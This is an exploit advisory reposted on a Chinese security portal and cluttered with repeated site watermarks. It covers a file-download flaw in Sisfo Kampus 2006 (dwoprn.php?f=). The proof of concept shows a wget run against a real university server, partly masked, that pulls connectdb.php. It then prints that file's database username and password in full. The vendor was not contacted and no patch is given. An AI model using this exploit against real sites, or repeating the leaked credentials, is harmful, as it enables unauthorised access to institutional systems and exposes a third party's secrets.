网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability  

Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability

2007-09-13  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

original File name : PUPET-SisfoKampus2006.txt

网管u家u.bitscn@com

  网管联盟bitsCN_com

Information : 网管u家www.bitscn.net

=========================

网管u家u.bitsCN.com

Advisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability 网管u家bitscn.net

Author: k-one A.K.A PUPET

网管u家u.bitsCN.com

Website vendor : http://sisfokampus.net/ 网管网www_bitscn_com

Problem : All Local File can downloaded

网管u家u.bitsCN.com


POC : 网管联盟bitsCN_com

=========================

网管u家bitscn.net

  网管联盟bitsCN@com

http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php

网管论坛bbs_bitsCN_com

  网管有家bitscn.net

 

中国网管论坛bbs.bitsCN.com

[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php 网管下载dl.bitscn.com

--07:30:16--  http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php 中国网管联盟bitsCN.com

           => `dwoprn.php?f=connectdb.php'

网管网www.bitscn.com

Resolving ***.*****-subang.ac.id... 203.130.***.** 网管u家u.bitscn@com

Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.

网管网www.bitscn.com

HTTP request sent, awaiting response... 200 OK

网管有家bitscn.net

Length: 292 [application/dwoprn]

网管网www.bitscn.com

  网管u家u.bitscn@com

100%[====================================================================================================================================================================>] 292           --.--K/s

中国网管论坛bbs.bitsCN.com

 

网管朋友网www_bitscn_net

07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]

中国网管论坛bbs.bitsCN.com

  网管朋友网www_bitscn_net

[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php 网管有家bitscn.net

<?php 网管u家www.bitscn.net

  // file: connectdb.php

网管u家www.bitscn.net

  // author: E. Setio Dewo, Maret 2003 网管u家www.bitscn.net

 

中国网管联盟bitsCN.com

  $db_username = "t26924_siak";

网管有家bitscn.net

  $db_hostname = "localhost";

网管联盟bitsCN@com

  $db_password = "siakang"; 网管u家bitscn.net

  $db_name = "t26924_siak";

中国网管联盟bitsCN.com

  网管u家u.bitscn@com

  $con = _connect($db_hostname, $db_username, $db_password);

网管u家u.bitscn@com

  $db  = _select_db($db_name, $con); 网管u家u.bitscn@com

 

网管下载dl.bitscn.com

?> 网管联盟bitsCN_com

Vendor Response: 网管网www.bitscn.com

==============

网管联盟bitsCN_com

Not contacted yet

网管u家u.bitscn@com

 

网管有家bitscn.net

Patch :

网管网www.bitscn.com

============= 网管u家bitscn.net

No Patch Available

中国网管联盟bitsCN.com

This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)

中国网管联盟bitsCN.com

TAGs     connectdb.php   dwoprn.php   File   http://   db_hostname      
 上一篇:Joomla Component Restaurante Remote File Upload Vulnerability   下一篇:phpRealty 0.02 (MGR) Multiple Remote File Inclusion Vulnerabilities
Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: